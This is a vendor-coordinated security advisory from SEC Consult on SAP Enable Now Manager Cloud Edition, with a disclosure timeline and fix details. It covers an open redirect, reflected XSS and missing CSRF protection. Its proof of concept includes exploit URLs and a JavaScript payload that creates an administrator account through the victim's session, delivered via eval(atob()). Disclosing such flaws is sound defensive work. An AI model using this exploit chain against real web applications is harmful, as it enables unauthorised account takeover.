Share
## https://sploitus.com/exploit?id=PACKETSTORM:174899
SEC Consult Vulnerability Lab Security Advisory < 20230927-0 >  
=======================================================================  
title: Multiple Vulnerabilities  
product: SAP® Enable Now Manager  
vulnerable version: 10.6.5 (Build 2804) Cloud Edition  
fixed version: May 2023 Release  
CVE number: N/A (cloud)  
impact: high  
homepage: https://www.sap.com/about.html  
found: 2022-10-21  
by: Paul Serban (Eviden)  
Fabian Hagg (Office Vienna)  
SEC Consult Vulnerability Lab  
  
An integrated part of SEC Consult, an Eviden business  
Europe | Asia  
  
https://www.sec-consult.com  
  
=======================================================================  
  
Vendor description:  
-------------------  
"SAP Enable Now solution provides advanced in-application help and  
training capabilities helping you to improve productivity and user  
adoption, as well as to increase satisfaction of the end-user experience.  
Create, maintain, and deliver in-application help, learning materials,  
and documentation content easily."  
  
Source: https://www.sapstore.com/solutions/41243/SAP-Enable-Now  
  
  
Business recommendation:  
------------------------  
Due to the Cloud Edition being affected, the vendor automatically pushed  
a fix in the production environment in the May 2023 Release.  
  
SEC Consult recommends to perform a thorough security review conducted by  
security professionals to identify and resolve potential further critical  
security issues.  
  
  
Vulnerability overview/description:  
-----------------------------------  
Multiple vulnerabilities were identified that could be chained together in  
order to allow a remote, unauthenticated attacker to create new administrative  
user accounts by tricking the victim to click on a malicious link or visit  
a malicious website prepared by the attacker.  
  
  
1) Open Redirect/URL Redirection Vulnerability  
The file download feature of the application contains an unvalidated  
parameter value that exposes it to an open redirect vulnerability. An  
attacker can create a malicious URL which would redirect the victim to  
a malicious site, for example, a phishing site convincing the victim  
to login once again.  
  
2) Reflected Cross Site Scripting (XSS)  
A reflected XSS vulnerability was found affecting the same parameter as  
used in 1). Due to insufficient input validation and output encoding, an  
attacker can inject arbitrary HTML or JavaScript code into the generated  
server response, executing it in the browser of the victim. The vulnerability,  
can be exploited, for example, to create new administrative user accounts  
in the application, thereby fully compromising the application. Any CSRF  
protection can be bypassed by means of this vulnerability.  
  
3) Insufficient Cross-Site Request Forgery (CSRF) Protection  
No implementation of CSRF protection was detected in the application.  
Using this vulnerability, an attacker can issue requests in the context  
of administrative user sessions. This includes critical state changing  
actions such as user creation or role assignment. Note that in the  
test environment the option 'Supported Functions' was set to value  
'DISABLE-CSRF-PROTECTION' in the server settings feature of the application.  
  
Certain configurations require this setting to be enabled, e.g. to allow  
the SEN Workflow Approver extension to submit the data on behalf of the  
logged-in user to the SAP Enable Now Manager. Without this parameter,  
the extension will only be able to read the content and workflow information)  
  
This indicates that there is an insecure feature which allows the protection  
mechanism to be disabled globally. It could not be clarified if this is the  
default setting. In any case, the function should still be enhanced to protect  
critical actions such as functions used in user management or role/permission  
management even if the mechanism is disabled by configuration.  
  
  
Proof of concept:  
-----------------  
1) Open Redirect/URL Redirection Vulnerability  
The public endpoint /resources/open_file.html is vulnerable to an  
open redirect via GET parameter 'info'. To verify this vulnerability,  
it is sufficient to open the following URL in a web browser.  
  
https://example.enable-now.cloud.sap/resources/open_file.html?info=https://www.sec-consult.com  
  
After browsing to the above link, the victim gets redirected to  
www.sec-consult.com in a new browser window opened by the embedded  
call of function window.open(). Note that both attacker and victim  
do not have to be authenticated for successful exploitation.  
  
  
2) Reflected Cross-Site Scripting (XSS)  
The public endpoint /resources/open_file.html is affected by an XSS  
vulnerability in GET parameter 'info'. To verify this vulnerability,  
it is sufficient to open the following URL in a web browser.  
  
https://example.enable-now.cloud.sap/resources/open_file.html?info=javascript:alert(document.domain)  
  
After browsing to the above link, the domain property returns the  
domain name of the server it was loaded from an alert window within  
the browser of the victim. This proves the successful execution of the  
injected JavaScript code. In fact, any kind of JavaScript code could  
be injected by the attacker. Note that both attacker and victim do  
not have to be authenticated for successful exploitation.  
  
  
3) Insufficient Cross-Site Request Forgery (CSRF) Protection  
No CSRF protection can be observed in POST requests sent between the  
client and server. This includes at least the functions "task creation",  
"user creation", "permission assignment" and "role/group assignment". Note  
that this vulnerability appears to only affect systems where the CSRF protection  
is disabled by option 'Supported Functions' set to value 'DISABLE-CSRF-PROTECTION'  
in the server settings. Although this setting can be reverted, it is advised  
to have the protection enabled for critical operations such as user creation  
or permission assignment at any time (also when the option is set).  
  
Several of the vulnerabilities above can be chained together by an  
unauthenticated attacker. Considering the types of vulnerabilities,  
there are multiple exploitation scenarios. In our example we will  
create a link that, when clicked by an administrator victim, will  
create a new admin account. For this attack to work, we first need  
to gather some information. To create an account, we need to know two  
important values: the OU and the UID. The OU represents the Organizational  
Unit unique identifier. The UID here represents the unique Group ID  
of our target group where we want our new user to be added. Performing  
a simple GET request to endpoint /self/group, both values can be  
obtained. The following listing shows the server response.  
  
------------------------------------------------------------------------------------------------  
HTTP/1.1 200  
Cache-Control: no-cache, no-store, must-revalidate  
Expires: 0  
Vary: Origin  
Set-Cookie: JSESSIONID=DD67AF<snip>ADF784; Path=/; Secure; HttpOnly;  
Content-Type: text/json;charset=UTF-8  
Server: SAP  
Connection: close  
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload  
Content-Length: 396  
  
{"response":{"group":[{"name":"Learners","uid":"G_1C67681<snip>60E0938C4CB086",  
"ou":"OU_E8BC20E2<snip>8034410C", "active":true},{"name":"Master Authors","uid":  
"G_72568DE0<snip>85DE0845","ou":"OU_E8BC20E2<snip>8034410C ","active":true},{"name  
":"Administrators","uid":"G_3B5DBB<snip>A97DE47C4EDF","ou":"OU_E8BC20E2<snip>80344 <-- UID of admin group and OU  
10C ","active":true}]}}  
------------------------------------------------------------------------------------------------  
  
  
Finally, in order for the attack to succeed, the attacker needs  
the victim (logged in as administrator) to do first a request on  
the above endpoint, then a POST request on the endpoint /!/user  
to actually create the new user account with the administrator  
role assigned using the values taken from the previous response.  
These interactions can be scripted using the following ten lines  
of JavaScript code.  
  
------------------------------------------------------------------------------------------------  
var req1 = new XMLHttpRequest();  
req1.open('GET', "https://example.enable-now.cloud.sap/self/group",false);  
req1.withCredentials = true;  
req1.send();  
var obj = JSON.parse(req1.responseText).response;  
for (var i = 0; i< obj.group.length ;i++) {if (obj.group[i].name === 'Administrators') {var uid = obj.group[i].uid;var ou = obj.group[i].ou}};  
var req2 = new XMLHttpRequest();  
req2.open('POST',"https://example.enable-now.cloud.sap/!/user",false);  
req2.withCredentials = true;  
req2.send(JSON.stringify({"user":{"auth_user":"sapmatt","firstname":"SEC","lastname":"Consult","email":"","passwd":"sappass","role":[uid],"ou":ou}}));  
------------------------------------------------------------------------------------------------  
  
We can base64-encode this payload and pass it to the Javascript eval(atob())  
function using the XSS vulnerability in the file download feature (seen in 2.).  
The link could then be shortened to enhance the likelihood of successful  
exploitation. This can be achieved, for example, by leveraging the Open Redirect  
vulnerability (seen in 1.) to redirect the victim to an attacker-controlled  
website and trigger the above payload, making it an attack more likely to  
succeed. If the victim is logged into the application and is part of  
the Administrator group, when they click on this link, a new admin  
account will be instantly created. The attacker then can log in and has  
full control over the application.  
  
  
Vulnerable / tested versions:  
-----------------------------  
The following versions of the software were found to be vulnerable during our tests:  
  
- SAP Enable Now Manager Version: 10.6.5 (Build 2804) - Cloud Edition (~October 2022)  
  
  
Vendor contact timeline:  
------------------------  
2022-11-08: Contacting vendor via secure@sap.com  
2022-11-10: Vendor requested screenshots and steps to reproduce  
2022-11-10: Informed vendor the previously provided POC contains the steps to reproduce  
and screenshots weren't available at that time  
2022-11-10: Vendor confirmed issues are under review  
2022-11-18: Contacted vendor to request an update  
2022-11-18: Vendor confirmed issues are still under review  
2022-12-01: Vendor reached back to confirm a Security Incident ticket was opened to  
the Engineering Team  
2023-02-02: Contacted vendor to request an update  
2023-02-03: Vendor confirmed that engineering had fixes ready and waiting on a  
release schedule.  
2023-02-07: Vendor confirmed fix was deployed to production for ticket no #2280196564  
2023-04-14: Contacted vendor to request update on ticket no #2280196563 fix  
2023-04-17: Vendor mentioned that the fix is scheduled to be deployed in May release  
2023-05-08: Vendor confirmed fix was deployed to production for 2280196563  
2023-09-27: Public release of security advisory.  
  
  
Solution:  
---------  
Due to the Cloud Edition being affected, the vendor automatically pushed  
a fix in the production environment in the May 2023 Release.  
  
  
Workaround:  
-----------  
None  
  
  
Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/  
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
SEC Consult Vulnerability Lab  
An integrated part of SEC Consult, an Eviden business  
Europe | Asia  
  
About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Eviden business. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/  
  
Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: https://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult  
  
EOF P. Serban, F. Hagg / @2023